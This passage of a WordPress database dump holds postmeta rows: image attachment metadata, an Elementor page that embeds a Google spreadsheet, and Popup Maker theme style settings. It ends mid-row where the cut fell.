(5154,1863,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:71:\"2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_2.jpg\";s:8:\"filesize\";i:409255;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:71:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_2-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21204;}s:5:\"large\";a:5:{s:4:\"file\";s:72:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_2-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:155872;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:71:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8518;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:71:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_2-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:98206;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:71:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_2-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22211;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5155,1864,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:71:\"2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_4.jpg\";s:8:\"filesize\";i:371085;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:71:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_4-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19581;}s:5:\"large\";a:5:{s:4:\"file\";s:72:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_4-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:142776;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:71:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7817;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:71:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_4-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:89786;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:71:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_4-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19778;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5156,1865,'_wp_attached_file','2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_1.jpg'),
(5157,1865,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:71:\"2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_1.jpg\";s:8:\"filesize\";i:382007;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:71:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_1-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19272;}s:5:\"large\";a:5:{s:4:\"file\";s:72:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_1-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:147531;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:71:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7633;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:71:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_1-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:92411;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:71:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18886;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5159,1852,'_edit_last','1'),
(5160,1852,'title_style','default'),
(5161,1852,'_title_style','field_5d1a0217cf408'),
(5162,1852,'related',''),
(5163,1852,'_related','field_603b51c3e183e'),
(5164,1866,'title_style','default'),
(5165,1866,'_title_style','field_5d1a0217cf408'),
(5166,1866,'related',''),
(5167,1866,'_related','field_603b51c3e183e'),
(5168,1867,'_edit_lock','1752542947:1'),
(5169,1868,'_wp_attached_file','2025/07/13-68.png'),
(5170,1868,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:17:\"2025/07/13-68.png\";s:8:\"filesize\";i:2601809;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"13-68-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:85152;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"13-68-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:718038;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"13-68-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:33826;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"13-68-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:811562;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"13-68-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1512567;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:17:\"13-68-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:84434;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5172,1867,'_thumbnail_id','1868'),
(5173,1867,'_edit_last','1'),
(5174,1867,'title_style','default'),
(5175,1867,'_title_style','field_5d1a0217cf408'),
(5176,1867,'related',''),
(5177,1867,'_related','field_603b51c3e183e'),
(5178,1869,'title_style','default'),
(5179,1869,'_title_style','field_5d1a0217cf408'),
(5180,1869,'related',''),
(5181,1869,'_related','field_603b51c3e183e'),
(5183,1852,'_thumbnail_id','1862'),
(5185,1870,'title_style','default'),
(5186,1870,'_title_style','field_5d1a0217cf408'),
(5187,1870,'related',''),
(5188,1870,'_related','field_603b51c3e183e'),
(5189,1871,'_elementor_edit_mode','builder'),
(5190,1871,'_elementor_template_type','wp-post'),
(5191,1871,'_elementor_version','3.29.2'),
(5192,1871,'_wp_page_template','default'),
(5193,1871,'_elementor_data','[{\"id\":\"8d18942\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"d98e4f2\",\"elType\":\"widget\",\"settings\":{\"embedpress_embeded_link\":\"https:\\/\\/docs.google.com\\/spreadsheets\\/d\\/18Al9i8m54QFeeHUxK9Yr6AVWTM3sifGz\\/edit?usp=sharing&ouid=116408890257525538205&rtpof=true&sd=true\",\"prefix_nftcreator\":\"Created By\",\"prefix_nftprice\":\"Current Price\",\"prefix_nftlastsale\":\"Last Sale\",\"label_nftbutton\":\"See Details\",\"loadmorelabel\":\"Load More\",\"label_nftrank\":\"Rank\",\"label_nftdetails\":\"Details\",\"instafeedFollowBtnLabel\":\"Follow\",\"instafeedPostsCountText\":\"[count] posts\",\"instafeedFollowersCountText\":\"[count] followers\",\"instafeedPopupFollowBtnLabel\":\"Follow\",\"instafeedLoadmoreLabel\":\"Load More\",\"cPopupButtonText\":\"Schedule time with me\",\"adWidth\":\"300\",\"adHeight\":\"200\",\"adStart\":\"5\",\"adSkipButtonAfter\":\"5\",\"embedpress_protection_message\":\"You do not have access to this content. Only users with the following roles can view it: [user_roles].\",\"embedpress_lock_content_error_message\":\"Oops, that wasn\'t the right password. Try again.\",\"embedpress_password_placeholder\":\"Password\",\"embedpress_submit_button_text\":\"Unlock\",\"embedpress_submit_Unlocking_text\":\"Unlocking...\",\"embedpress_lock_content_heading\":\"Content Locked\",\"embedpress_lock_content_sub_heading\":\"Content is locked and requires password to access it.\",\"embedpress_lock_content_footer_message\":\"In case you don\'t have the password, kindly reach out to content owner or administrator to request access.\",\"width\":{\"unit\":\"px\",\"size\":1500,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"embedpres_elementor\"}],\"isInner\":false}]'),
(5197,1871,'title_style','default'),
(5198,1871,'_title_style','field_5d1a0217cf408'),
(5199,1872,'_elementor_edit_mode','builder'),
(5200,1872,'_elementor_template_type','wp-post'),
(5201,1872,'_elementor_version','3.29.2'),
(5202,1872,'_wp_page_template','default'),
(5203,1872,'_elementor_data','[{\"id\":\"8d18942\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"d98e4f2\",\"elType\":\"widget\",\"settings\":{\"embedpress_embeded_link\":\"https:\\/\\/docs.google.com\\/spreadsheets\\/d\\/18Al9i8m54QFeeHUxK9Yr6AVWTM3sifGz\\/edit?usp=sharing&ouid=116408890257525538205&rtpof=true&sd=true\",\"prefix_nftcreator\":\"Created By\",\"prefix_nftprice\":\"Current Price\",\"prefix_nftlastsale\":\"Last Sale\",\"label_nftbutton\":\"See Details\",\"loadmorelabel\":\"Load More\",\"label_nftrank\":\"Rank\",\"label_nftdetails\":\"Details\",\"instafeedFollowBtnLabel\":\"Follow\",\"instafeedPostsCountText\":\"[count] posts\",\"instafeedFollowersCountText\":\"[count] followers\",\"instafeedPopupFollowBtnLabel\":\"Follow\",\"instafeedLoadmoreLabel\":\"Load More\",\"cPopupButtonText\":\"Schedule time with me\",\"adWidth\":\"300\",\"adHeight\":\"200\",\"adStart\":\"5\",\"adSkipButtonAfter\":\"5\",\"embedpress_protection_message\":\"You do not have access to this content. Only users with the following roles can view it: [user_roles].\",\"embedpress_lock_content_error_message\":\"Oops, that wasn\'t the right password. Try again.\",\"embedpress_password_placeholder\":\"Password\",\"embedpress_submit_button_text\":\"Unlock\",\"embedpress_submit_Unlocking_text\":\"Unlocking...\",\"embedpress_lock_content_heading\":\"Content Locked\",\"embedpress_lock_content_sub_heading\":\"Content is locked and requires password to access it.\",\"embedpress_lock_content_footer_message\":\"In case you don\'t have the password, kindly reach out to content owner or administrator to request access.\",\"width\":{\"unit\":\"px\",\"size\":1500,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"embedpres_elementor\"}],\"isInner\":false}]'),
(5207,1872,'title_style','default'),
(5208,1872,'_title_style','field_5d1a0217cf408'),
(5209,1873,'_pum_built_in','default-theme'),
(5210,1873,'_pum_default_theme','1'),
(5211,1873,'popup_theme_data_version','3'),
(5212,1873,'popup_theme_settings','a:67:{s:24:\"overlay_background_color\";s:7:\"#ffffff\";s:26:\"overlay_background_opacity\";i:100;s:13:\"atc_promotion\";N;s:17:\"container_padding\";i:18;s:23:\"container_border_radius\";i:0;s:26:\"container_background_color\";s:7:\"#f9f9f9\";s:28:\"container_background_opacity\";i:100;s:22:\"container_border_style\";s:4:\"none\";s:22:\"container_border_color\";s:7:\"#000000\";s:22:\"container_border_width\";i:1;s:25:\"container_boxshadow_color\";s:7:\"#020202\";s:27:\"container_boxshadow_opacity\";i:23;s:30:\"container_boxshadow_horizontal\";i:1;s:28:\"container_boxshadow_vertical\";i:1;s:24:\"container_boxshadow_blur\";i:3;s:26:\"container_boxshadow_spread\";i:0;s:25:\"container_boxshadow_inset\";s:2:\"no\";s:16:\"title_font_color\";s:7:\"#000000\";s:15:\"title_font_size\";i:32;s:17:\"title_line_height\";i:36;s:17:\"title_font_family\";s:7:\"inherit\";s:17:\"title_font_weight\";i:400;s:16:\"title_font_style\";s:6:\"normal\";s:16:\"title_text_align\";s:4:\"left\";s:22:\"title_textshadow_color\";s:7:\"#020202\";s:24:\"title_textshadow_opacity\";i:23;s:27:\"title_textshadow_horizontal\";i:0;s:25:\"title_textshadow_vertical\";i:0;s:21:\"title_textshadow_blur\";i:0;s:18:\"content_font_color\";s:7:\"#8c8c8c\";s:19:\"content_font_family\";s:7:\"inherit\";s:19:\"content_font_weight\";i:400;s:18:\"content_font_style\";s:7:\"inherit\";s:10:\"close_text\";s:5:\"CLOSE\";s:22:\"close_position_outside\";b:0;s:14:\"close_location\";s:8:\"topright\";s:18:\"close_position_top\";i:0;s:21:\"close_position_bottom\";i:0;s:19:\"close_position_left\";i:0;s:20:\"close_position_right\";i:0;s:13:\"close_padding\";i:8;s:12:\"close_height\";i:0;s:11:\"close_width\";i:0;s:19:\"close_border_radius\";i:0;s:22:\"close_background_color\";s:7:\"#00b7cd\";s:24:\"close_background_opacity\";i:100;s:16:\"close_font_color\";s:7:\"#ffffff\";s:15:\"close_font_size\";i:12;s:17:\"close_line_height\";i:36;s:17:\"close_font_family\";s:7:\"inherit\";s:17:\"close_font_weight\";i:400;s:16:\"close_font_style\";s:7:\"inherit\";s:18:\"close_border_style\";s:4:\"none\";s:18:\"close_border_color\";s:7:\"#ffffff\";s:18:\"close_border_width\";i:1;s:21:\"close_boxshadow_color\";s:7:\"#020202\";s:23:\"close_boxshadow_opacity\";i:23;s:26:\"close_boxshadow_horizontal\";i:1;s:24:\"close_boxshadow_vertical\";i:1;s:20:\"close_boxshadow_blur\";i:3;s:22:\"close_boxshadow_spread\";i:0;s:21:\"close_boxshadow_inset\";s:2:\"no\";s:22:\"close_textshadow_color\";s:7:\"#000000\";s:24:\"close_textshadow_opacity\";i:23;s:27:\"close_textshadow_horizontal\";i:0;s:25:\"close_textshadow_vertical\";i:0;s:21:\"close_textshadow_blur\";i:0;}'),
(5213,1874,'popup_theme_settings','a:67:{s:24:\"overlay_background_color\";s:7:\"#000000\";s:26:\"overlay_background_opacity\";s:2:\"60\";s:17:\"container_padding\";s:2:\"18\";s:26:\"container_background_color\";s:7:\"#ffffff\";s:28:\"container_background_opacity\";s:3:\"100\";s:22:\"container_border_style\";s:5:\"solid\";s:22:\"container_border_color\";s:7:\"#000000\";s:22:\"container_border_width\";s:1:\"8\";s:23:\"container_border_radius\";s:1:\"3\";s:25:\"container_boxshadow_inset\";s:2:\"no\";s:30:\"container_boxshadow_horizontal\";s:1:\"0\";s:28:\"container_boxshadow_vertical\";s:1:\"0\";s:24:\"container_boxshadow_blur\";s:2:\"30\";s:26:\"container_boxshadow_spread\";s:1:\"0\";s:25:\"container_boxshadow_color\";s:7:\"#020202\";s:27:\"container_boxshadow_opacity\";s:3:\"100\";s:16:\"title_font_color\";s:7:\"#000000\";s:17:\"title_line_height\";s:2:\"36\";s:15:\"title_font_size\";s:2:\"32\";s:17:\"title_font_family\";s:7:\"inherit\";s:17:\"title_font_weight\";s:3:\"100\";s:16:\"title_font_style\";s:0:\"\";s:16:\"title_text_align\";s:4:\"left\";s:27:\"title_textshadow_horizontal\";s:1:\"0\";s:25:\"title_textshadow_vertical\";s:1:\"0\";s:21:\"title_textshadow_blur\";s:1:\"0\";s:22:\"title_textshadow_color\";s:7:\"#020202\";s:24:\"title_textshadow_opacity\";s:2:\"23\";s:18:\"content_font_color\";s:7:\"#000000\";s:19:\"content_font_family\";s:7:\"inherit\";s:19:\"content_font_weight\";s:3:\"100\";s:18:\"content_font_style\";s:0:\"\";s:10:\"close_text\";s:7:\"&times;\";s:14:\"close_location\";s:8:\"topright\";s:18:\"close_position_top\";s:3:\"-13\";s:19:\"close_position_left\";s:1:\"0\";s:21:\"close_position_bottom\";s:1:\"0\";s:20:\"close_position_right\";s:3:\"-13\";s:13:\"close_padding\";s:1:\"0\";s:12:\"close_height\";s:2:\"26\";s:11:\"close_width\";s:2:\"26\";s:22:\"close_background_color\";s:7:\"#000000\";s:24:\"close_background_opacity\";s:3:\"100\";s:16:\"close_font_color\";s:7:\"#ffffff\";s:17:\"close_line_height\";s:2:\"24\";s:15:\"close_font_size\";s:2:\"24\";s:17:\"close_font_family\";s:5:\"Arial\";s:17:\"close_font_weight\";s:3:\"100\";s:16:\"close_font_style\";s:0:\"\";s:18:\"close_border_style\";s:5:\"solid\";s:18:\"close_border_color\";s:7:\"#ffffff\";s:18:\"close_border_width\";s:1:\"2\";s:19:\"close_border_radius\";s:2:\"26\";s:21:\"close_boxshadow_inset\";s:2:\"no\";s:26:\"close_boxshadow_horizontal\";s:1:\"0\";s:24:\"close_boxshadow_vertical\";s:1:\"0\";s:20:\"close_boxshadow_blur\";s:2:\"15\";s:22:\"close_boxshadow_spread\";s:1:\"1\";s:21:\"close_boxshadow_color\";s:7:\"#020202\";s:23:\"close_boxshadow_opacity\";s:2:\"75\";s:27:\"close_textshadow_horizontal\";s:1:\"0\";s:25:\"close_textshadow_vertical\";s:1:\"0\";s:21:\"close_textshadow_blur\";s:1:\"0\";s:22:\"close_textshadow_color\";s:7:\"#000000\";s:24:\"close_textshadow_opacity\";s:2:\"23\";s:13:\"atc_promotion\";N;s:22:\"close_position_outside\";i:0;}'),
(5214,1874,'popup_theme_data_version','3'),
(5215,1874,'_pum_built_in','lightbox'),
(5216,1875,'popup_theme_settings','a:67:{s:24:\"overlay_background_color\";s:7:\"#000000\";s:26:\"overlay_background_opacity\";s:2:\"70\";s:17:\"container_padding\";s:2:\"28\";s:26:\"container_background_color\";s:7:\"#ffffff\";s:28:\"container_background_opacity\";s:3:\"100\";s:22:\"container_border_style\";s:4:\"none\";s:22:\"container_border_color\";s:7:\"#000000\";s:22:\"container_border_width\";s:1:\"1\";s:23:\"container_border_radius\";s:1:\"5\";s:25:\"container_boxshadow_inset\";s:2:\"no\";s:30:\"container_boxshadow_horizontal\";s:1:\"0\";s:28:\"container_boxshadow_vertical\";s:2:\"10\";s:24:\"container_boxshadow_blur\";s:2:\"25\";s:26:\"container_boxshadow_spread\";s:1:\"4\";s:25:\"container_boxshadow_color\";s:7:\"#020202\";s:27:\"container_boxshadow_opacity\";s:2:\"50\";s:16:\"title_font_color\";s:7:\"#315b7c\";s:17:\"title_line_height\";s:2:\"36\";s:15:\"title_font_size\";s:2:\"34\";s:17:\"title_font_family\";s:7:\"inherit\";s:17:\"title_font_weight\";s:3:\"100\";s:16:\"title_font_style\";s:0:\"\";s:16:\"title_text_align\";s:4:\"left\";s:27:\"title_textshadow_horizontal\";s:1:\"0\";s:25:\"title_textshadow_vertical\";s:1:\"0\";s:21:\"title_textshadow_blur\";s:1:\"0\";s:22:\"title_textshadow_color\";s:7:\"#020202\";s:24:\"title_textshadow_opacity\";s:2:\"23\";s:18:\"content_font_color\";s:7:\"#2d2d2d\";s:19:\"content_font_family\";s:7:\"inherit\";s:19:\"content_font_weight\";s:3:\"100\";s:18:\"content_font_style\";s:0:\"\";s:10:\"close_text\";s:2:\"×\";s:14:\"close_location\";s:8:\"topright\";s:18:\"close_position_top\";s:1:\"8\";s:19:\"close_position_left\";s:1:\"0\";s:21:\"close_position_bottom\";s:1:\"0\";s:20:\"close_position_right\";s:1:\"8\";s:13:\"close_padding\";s:1:\"4\";s:12:\"close_height\";s:2:\"28\";s:11:\"close_width\";s:2:\"28\";s:22:\"close_background_color\";s:7:\"#315b7c\";s:24:\"close_background_opacity\";s:3:\"100\";s:16:\"close_font_color\";s:7:\"#ffffff\";s:17:\"close_line_height\";s:2:\"20\";s:15:\"close_font_size\";s:2:\"20\";s:17:\"close_font_family\";s:15:\"Times New Roman\";s:17:\"close_font_weight\";s:3:\"100\";s:16:\"close_font_style\";s:0:\"\";s:18:\"close_border_style\";s:4:\"none\";s:18:\"close_border_color\";s:7:\"#ffffff\";s:18:\"close_border_width\";s:1:\"1\";s:19:\"close_border_radius\";s:2:\"42\";s:21:\"close_boxshadow_inset\";s:2:\"no\";s:26:\"close_boxshadow_horizontal\";s:1:\"0\";s:24:\"close_boxshadow_vertical\";s:1:\"0\";s:20:\"close_boxshadow_blur\";s:1:\"0\";s:22:\"close_boxshadow_spread\";s:1:\"0\";s:21:\"close_boxshadow_color\";s:7:\"#020202\";s:23:\"close_boxshadow_opacity\";s:2:\"23\";s:27:\"close_textshadow_horizontal\";s:1:\"0\";s:25:\"close_textshadow_vertical\";s:1:\"0\";s:21:\"close_textshadow_blur\";s:1:\"0\";s:22:\"close_textshadow_color\";s:7:\"#000000\";s:24:\"close_textshadow_opacity\";s:2:\"23\";s:13:\"atc_promotion\";N;s:22:\"close_position_outside\";i:0;}'),
(5217,1875,'popup_theme_data_version','3'),
(5218,1875,'_pum_built_in','enterprise-blue'),
(5219,1876,'popup_theme_settings','a:67:{s:24:\"overlay_background_color\";s:7:\"#000000\";s:26:\"overlay_background_opacity\";s:2:\"75\";s:17:\"container_padding\";s:2:\"30\";s:26:\"container_background_color\";s:7:\"#ffffff\";s:28:\"container_background_opacity\";s:3:\"100\";s:22:\"container_border_style\";s:5:\"solid\";s:22:\"container_border_color\";s:7:\"#81d742\";s:22:\"container_border_width\";s:2:\"14\";s:23:\"container_border_radius\";s:2:\"80\";s:25:\"container_boxshadow_inset\";s:2:\"no\";s:30:\"container_boxshadow_horizontal\";s:1:\"0\";s:28:\"container_boxshadow_vertical\";s:1:\"0\";s:24:\"container_boxshadow_blur\";s:1:\"0\";s:26:\"container_boxshadow_spread\";s:1:\"0\";s:25:\"container_boxshadow_color\";s:7:\"#020202\";s:27:\"container_boxshadow_opacity\";s:1:\"0\";s:16:\"title_font_color\";s:7:\"#2d2d2d\";s:17:\"title_line_height\";s:2:\"36\";s:15:\"title_font_size\";s:2:\"32\";s:17:\"title_font_family\";s:10:\"Montserrat\";s:17:\"title_font_weight\";s:3:\"100\";s:16:\"title_font_style\";s:0:\"\";s:16:\"title_text_align\";s:4:\"left\";s:27:\"title_textshadow_horizontal\";s:1:\"0\";s:25:\"title_textshadow_vertical\";s:1:\"0\";s:21:\"title_textshadow_blur\";s:1:\"0\";s:22:\"title_textshadow_color\";s:7:\"#020202\";s:24:\"title_textshadow_opacity\";s:2:\"23\";s:18:\"content_font_color\";s:7:\"#2d2d2d\";s:19:\"content_font_family\";s:7:\"inherit\";s:19:\"content_font_weight\";s:3:\"100\";s:18:\"content_font_style\";s:0:\"\";s:10:\"close_text\";s:2:\"×\";s:14:\"close_location\";s:8:\"topright\";s:18:\"close_position_top\";s:3:\"-30\";s:19:\"close_position_left\";s:3:\"-30\";s:21:\"close_position_bottom\";s:1:\"0\";s:20:\"close_position_right\";s:3:\"-30\";s:13:\"close_padding\";s:1:\"0\";s:12:\"close_height\";s:1:\"0\";s:11:\"close_width\";s:1:\"0\";s:22:\"close_background_color\";s:7:\"#ffffff\";s:24:\"close_background_opacity\";s:3:\"100\";s:16:\"close_font_color\";s:7:\"#2d2d2d\";s:17:\"close_line_height\";s:2:\"28\";s:15:\"close_font_size\";s:2:\"32\";s:17:\"close_font_family\";s:15:\"Times New Roman\";s:17:\"close_font_weight\";s:3:\"100\";s:16:\"close_font_style\";s:0:\"\";s:18:\"close_border_style\";s:4:\"none\";s:18:\"close_border_color\";s:7:\"#ffffff\";s:18:\"close_border_width\";s:1:\"1\";s:19:\"close_border_radius\";s:2:\"28\";s:21:\"close_boxshadow_inset\";s:2:\"no\";s:26:\"close_boxshadow_horizontal\";s:1:\"0\";s:24:\"close_boxshadow_vertical\";s:1:\"0\";s:20:\"close_boxshadow_blur\";s:1:\"0\";s:22:\"close_boxshadow_spread\";s:1:\"0\";s:21:\"close_boxshadow_color\";s:7:\"#020202\";s:23:\"close_boxshadow_opacity\";s:2:\"23\";s:27:\"close_textshadow_horizontal\";s:1:\"0\";s:25:\"close_textshadow_vertical\";s:1:\"0\";s:21:\"close_textshadow_blur\";s:1:\"0\";s:22:\"close_textshadow_color\";s:7:\"#000000\";s:24:\"close_textshadow_opacity\";s:2:\"23\";s:13:\"atc_promotion\";N;s:22:\"close_position_outside\";i:0;}'),
(5220,1876,'popup_theme_data_version','3'),
(5221,1876,'_pum_built_in','hello-box'),
(5222,1877,'popup_theme_settings','a:67:{s:24:\"overlay_background_color\";s:7:\"#000000\";s:26:\"overlay_background_opacity\";s:2:\"50\";s:17:\"container_padding\";s:2:\"18\";s:26:\"container_background_color\";s:7:\"#1e73be\";s:28:\"container_background_opacity\";s:3:\"100\";s:22:\"container_border_style\";s:4:\"none\";s:22:\"container_border_color\";s:7:\"#000000\";s:22:\"container_border_width\";s:1:\"1\";s:23:\"container_border_radius\";s:1:\"0\";s:25:\"container_boxshadow_inset\";s:2:\"no\";s:30:\"container_boxshadow_horizontal\";s:1:\"0\";s:28:\"container_boxshadow_vertical\";s:2:\"10\";s:24:\"container_boxshadow_blur\";s:2:\"25\";s:26:\"container_boxshadow_spread\";s:1:\"0\";s:25:\"container_boxshadow_color\";s:7:\"#020202\";s:27:\"container_boxshadow_opacity\";s:2:\"50\";s:16:\"title_font_color\";s:7:\"#ffffff\";s:17:\"title_line_height\";s:2:\"28\";s:15:\"title_font_size\";s:2:\"26\";s:17:\"title_font_family\";s:10:\"Sans-Serif\";s:17:\"title_font_weight\";s:3:\"100\";s:16:\"title_font_style\";s:0:\"\";s:16:\"title_text_align\";s:4:\"left\";s:27:\"title_textshadow_horizontal\";s:1:\"0\";s:25:\"title_textshadow_vertical\";s:1:\"0\";s:21:\"title_textshadow_blur\";s:1:\"0\";s:22:\"title_textshadow_color\";s:7:\"#020202\";s:24:\"title_textshadow_opacity\";s:2:\"23\";s:18:\"content_font_color\";s:7:\"#ffffff\";s:19:\"content_font_family\";s:7:\"inherit\";s:19:\"content_font_weight\";s:3:\"100\";s:18:\"content_font_style\";s:0:\"\";s:10:\"close_text\";s:2:\"×\";s:14:\"close_location\";s:8:\"topright\";s:18:\"close_position_top\";s:1:\"0\";s:19:\"close_position_left\";s:1:\"0\";s:21:\"close_position_bottom\";s:1:\"0\";s:20:\"close_position_right\";s:1:\"0\";s:13:\"close_padding\";s:1:\"0\";s:12:\"close_height\";s:2:\"24\";s:11:\"close_width\";s:2:\"24\";s:22:\"close_background_color\";s:7:\"#eeee22\";s:24:\"close_background_opacity\";s:3:\"100\";s:16:\"close_font_color\";s:7:\"#1e73be\";s:17:\"close_line_height\";s:2:\"24\";s:15:\"close_font_size\";s:2:\"32\";s:17:\"close_font_family\";s:15:\"Times New 